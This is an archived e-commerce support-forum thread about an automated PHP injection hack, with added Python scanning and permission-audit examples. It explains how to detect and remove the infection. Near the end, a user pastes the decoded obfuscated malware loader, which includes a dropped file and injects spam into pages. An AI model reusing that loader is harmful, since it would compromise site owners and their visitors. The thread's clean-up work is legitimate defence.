
eval(base64_decode Hack


FIMBLE


eval(base64_decode hack going around the internet,

 

If your cart “suddenly” stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack.

Some of the more common signs of this are

* Category images stop displaying

* FCK editor refuses to display images folder

* Payment modules stop working

* Checkout process stops working

 

How will you know?

Open any PHP file on your server. If at the very top you see a line like

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)

Then you have been hacked.

 

To clean your site you have two options,

1. Delete the entire set of PHP files on your server (this hack will infect every single PHP file regardless of where it belongs, i.e. non-osC files will also be infected)

and restore from a good backup. This is the best and easiest route.

 

2. You need to find the source of the files that have been placed on your server; they are always hidden well away from the top level. To do this you need to copy the top line and paste it into a Base64 decoder. I have my own file for this, but you will be able to use any of many on the internet; here is one

 

This will reveal the location of the files you have to remove. Note that it could be from 1 file to up to 30, and in some cases they will overwrite the files that should be in the host folder.

 

Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line. I suggest you use a search / replace tool for this or it's going to take you a very long time!

 

When this has been done it will be good practice to “drop” your database and upload a recent backup you took prior to infection. Also check that there are no new users in the database; I’ve not come across this yet, but have heard it happens.

 

Now your site is free of the code, you need to prevent it from happening again.

 

How to prevent infection.

 

This is not guaranteed 100% proof, but it is going to help stop re-infection.

 

Change the name of your admin folder to something less obvious.

Delete admin/filemanager.php and associated links.

Ensure that your folder permissions are never set higher than 755.

Install some security addons,

Also some ideas from this post can help you,

If you do nothing, and do not rename your admin folder or delete filemanager.php, it is not a question of if, more when.

There is a lot of fragmented help on the forums; I have pulled some of it together here. Read up all you can, there are a lot of great people posting good information here.

Sometimes you're the dog and sometimes the lamp post


My Contributions
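Added example, not code from the thread or from osCommerce: a Python scanner that automates the clean-up steps above on a local copy of the web root. It spots PHP files whose first line is the injected `<?php /**/eval(base64_decode('...')); ?>`, decodes the Base64 to list the dropped files the loader `include_once()`s, and strips the injected line (the search / replace step). The sample payload and the `/home/example/...` path are constructed for the demo.

```python
# Added example, not code from the thread or from osCommerce: automates the
# steps above (spot the injected line, decode it, list the dropped files, strip it).
import base64
import re
import tempfile
from pathlib import Path

# The marker as quoted in the thread: <?php /**/eval(base64_decode('...')); ?>
PREFIX_RE = re.compile(
    r"^<\?php\s*/\*\*/\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>[ \t]*\r?\n?")
# Paths the decoded loader tests for or includes: these are the dropped files to remove.
PATH_RE = re.compile(r"(?:file_exists|include_once|include|require_once|require)\('([^']+)'\)")

# Constructed sample loader, shaped like the one decoded later in this thread; path is made up.
SAMPLE_PAYLOAD = ("if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;"
                  "if(file_exists('/home/example/public_html/catalog/style.css.php')){"
                  "include_once('/home/example/public_html/catalog/style.css.php');}}")
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
INFECTED = f"<?php /**/eval(base64_decode('{SAMPLE_B64}')); ?>\n<?php\n// original file\n"

def decode_payload(b64: str) -> str:
    """Decode the base64 argument to readable PHP (the 'decode the top line' step)."""
    return base64.b64decode(b64, validate=True).decode("latin-1")

def dropped_files(payload: str) -> list[str]:
    """Unique dropped-file paths referenced by the decoded loader, in order of appearance."""
    return list(dict.fromkeys(PATH_RE.findall(payload)))

def inspect_file(path: Path):
    """Return a finding for an infected PHP file (prefix present), or None when it is clean."""
    m = PREFIX_RE.match(path.read_text(encoding="latin-1"))
    if not m:
        return None
    return {"file": str(path), "dropped": dropped_files(decode_payload(m.group(1)))}

def clean_file(path: Path) -> bool:
    """Strip the injected first line in place (the search/replace step); True if changed."""
    text = path.read_text(encoding="latin-1")
    m = PREFIX_RE.match(text)
    if not m:
        return False
    path.write_text(text[m.end():], encoding="latin-1")
    return True

def scan_tree(root: Path) -> list[dict]:
    """Inspect every .php file under root; the hack hits all PHP files, not only osC ones."""
    return [r for p in sorted(root.rglob("*.php")) if (r := inspect_file(p)) is not None]

def demo() -> dict:
    """Build a constructed infected tree in a temp dir, scan it, clean it, and summarise."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "sub").mkdir()
        (root / "index.php").write_text(INFECTED, encoding="latin-1")
        (root / "sub" / "redirect.php").write_text(INFECTED, encoding="latin-1")
        (root / "clean.php").write_text("<?php\necho 1;\n", encoding="latin-1")
        findings = scan_tree(root)
        cleaned = sum(clean_file(Path(f["file"])) for f in findings)
        return {"infected": len(findings), "cleaned": cleaned, "after": len(scan_tree(root)),
                "dropped": findings[0]["dropped"],
                "restored": (root / "index.php").read_text(encoding="latin-1") == "<?php\n// original file\n"}

if __name__ == "__main__":
    print(demo())
```

Run it against a copy of the site, not the live tree, and still compare the folder contents with a known-good backup afterwards: the scanner only finds files the loader names, not everything an attacker may have added.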


Thank you very much for the information. I found a file called NuSoup.php that I don't recognize. Could this be a file used for hacking?

I am a Jedi, like my father before me!


Ensure that your folder permissions are never set higher than 755
It's worth noting that ownership is as important as permissions. If the web user owns the folder, then folder permissions of 755 are effectively as insecure as 777. If the configure.php file requires 444 permissions for the warning to turn off, then no file or directory should be writable, i.e. 444 permissions for files and 555 permissions for directories.

 

A better solution would be to have the web user be some account other than the main user account, but many hosts do not seem to support that.

Always back up before making changes.
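Added example, not code from the thread or from osCommerce, for POSIX hosts: a Python audit that flags everything under a web root that the web-server account could write, judging ownership (the point made above) as well as the 444 / 555 targets. The sample tree is constructed, and the demo treats the current user as the web-server account.

```python
# Added example, not code from the thread or from osCommerce: audits a web root for
# objects the web-server account could modify, judging ownership as well as mode,
# since a 755/644 object owned by the web user is as writable to it as 777.
import os
import stat
import tempfile
from pathlib import Path

# Targets from the post above: files 444, directories 555.
FILE_MAX, DIR_MAX = 0o444, 0o555

def writable_by_web(path: Path, web_uid: int) -> list[str]:
    """Reasons the web-server account (web_uid) could write this path; empty if none."""
    st = path.lstat()
    mode = stat.S_IMODE(st.st_mode)
    reasons = []
    if mode & 0o002:
        reasons.append("world-writable")
    if mode & 0o020:
        reasons.append("group-writable")
    if st.st_uid == web_uid and mode & 0o200:
        reasons.append("owned by web user and owner-writable")
    limit = DIR_MAX if stat.S_ISDIR(st.st_mode) else FILE_MAX
    if mode & ~limit:
        reasons.append(f"mode {mode:o} exceeds {limit:o}")
    return reasons

def audit(root: Path, web_uid: int) -> dict[str, list[str]]:
    """Findings for everything under root, keyed by relative path; clean objects are omitted."""
    findings = {}
    for p in sorted(root.rglob("*")):
        if p.is_symlink():
            continue
        reasons = writable_by_web(p, web_uid)
        if reasons:
            findings[p.relative_to(root).as_posix()] = reasons
    return findings

def demo() -> dict[str, list[str]]:
    """Constructed tree audited as if the current user were the web-server account."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "includes").mkdir()
        (root / "includes" / "configure.php").write_text("<?php\n")
        os.chmod(root / "includes" / "configure.php", 0o444)  # as osC's warning wants
        os.chmod(root / "includes", 0o555)
        (root / "index.php").write_text("<?php\n")
        os.chmod(root / "index.php", 0o644)                  # the usual default
        (root / "images").mkdir()
        os.chmod(root / "images", 0o777)                     # the classic bad advice
        result = audit(root, os.getuid())
        os.chmod(root / "includes", 0o755)  # writable again so the temp dir can be removed
        return result

if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", "; ".join(reasons))
```

On a real host, pass the uid of the account the web server runs as (it is often the same as the FTP account on shared hosting, which is exactly the problem the post describes).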


Damn, I am hacked. I saw that line about a month ago and I thought it was strange, but it didn't catch enough attention from me.

 

Now I saw some product_info.php/?fxkp=0'>forex online system trading stuff above my body HTML code, and I said it was impossible.

 

I hope to clean up my whole sites.

 

Regards


FYI on this hack... I found where it appears as though the hack came through my community forum to get to my site. My forum admin recorded the IP address along with what looks to be all the attempts to get in to PHP files. So, it would certainly appear as though this was the attacker. The IP 98.206.239.156 registers out of Aurora, Illinois. Anyone have the capabilities to research this IP to see if it is the hacker?

 

For what it's worth, in case any of you have a forum, he is registering under the name [email protected]

My list of banned IPs continues to grow.


Someone else posted that their hack came from a server in a Chevy van somewhere along the arctic circle...

:huh:

 

Like vultures to a rotting carcass...

:o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


Question on the database restore part...

 

Will I lose any info that I've acquired from infection (9/22) until now?

 

Yes you will, restoring will take your database and all information contained within back to the restore date.

Nic


I also have been hacked and found the malicious code. I banned an IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious.

 

I used the decode hack and it didn't work for me. Can someone tell me which files were planted and need to be removed?

 

What a mess, we work so hard to get our sites perfect, and also get top rankings, only to be hacked.

 

Weird thing is my site works just fine, but the code is in every php file, and the company forex is listed a million times behind each page in the body.

Flying away to get back to work.


There are times when the site will function without a problem, this is what the hacker wants as they are then able to maximise the amount of time they exist on your site without discovery.

You really need to decode the line to find the place that the files are located in.

There can be a lot of files or one or two, and called different names.

style.css.php is one

dg.php another

there are .swf files also

 

With the decoder, just add the code minus the <?php (' at the start and the ')?> at the end.

Nic

Hello, can you help?

 

Followed advice and I was infected. Have been through all files and removed all PHP from the server. I assume that restore is done from the osCommerce admin. When I go to access this, I have deleted shop/admin/login.php and so can't access it to reload. I know my product information is still there in files, pics etc. How can I get the missing PHP so I can restore?


Hello,

 

I have tried so many ways to use the decoder you recommend, with no luck. Here is the code:

 

**/eval(base64_decode('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')); ?>

<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products['total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent['total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }

// BOF edit pages
  $pages_name = "home";
  $page_query = tep_db_query("select pd.pages_title, pd.pages_body, p.pages_id


here it is

'/catalog/includes/languages/english/modules/shipping/style.css.php

 

For anyone else having problems you need to strip the tags and apostrophes so it looks like

 


 

Nic


So besides cleaning or replacing each php file, is that the only file that needs to be removed?


You need to compare the folder contents with either your backup or another trusted source; as I've said a few times here, there can be many new files added.

You will be better off deleting the folder and uploading a good one.

Nic


Nic found 35 hidden files in my site that didn't belong there. One of the files was style.css, some people might have missed that one. He cleaned all the files and my site is perfect now.

 

I have one question though. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this?

 

Even though my team the Dallas Cowboys lost, I can sleep good knowing my site is up and running.

 

Funny, I am sleeping when most of you are awake and vice versa.

 

Best wishes!

Sam- in Texas


Joining the club - Hacked - and my team lost again today.

 

I can confirm that any php file, even simple redirects in subdomains, will get nailed. Incidentally I had 755 as the minimum, but now I know better.

 

Anyone know if they are smart enough to hide these files in directories other than OsCommerce such as WordPress or Joomla?

 

Obviously the authors "like" OsCommerce.

After a quick check it seems that most of the open source php programs were hit, which includes WordPress and Joomla. One thing in common is the use of 'Admin' or 'Administration' in folder and file names. The WordPress discussions are advising the deletion and reloading of dbases.

Permissions are not the determining factor for this attack; it's the presence of the admin folder still called admin, and the filemanager.php.

Once in, it will spread to any PHP file, platform / package independent, adding its code as it goes.

I can imagine in a lot of cases there will be many more PHP files than osC ones.


Question

 

I have one question. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this?


I was able to decode mine and found out that the file was added to a WordPress blog that I have on another domain that is hosted within my osCommerce store account.

 

I decided to delete the whole blog from the server.

 

I still have a question about the code, which I have pasted below already decoded... As you see, there is still a lot of it not decoded, followed by a "gzdecode". How can I decode that?

 

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/content/y/o/g/yogicchai/html/pilotbaba/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php')){include_once('/home/content/y/o/g/yogicchai/html/pilotbaba/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return 
gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}


Archived

This topic is now archived and is closed to further replies.
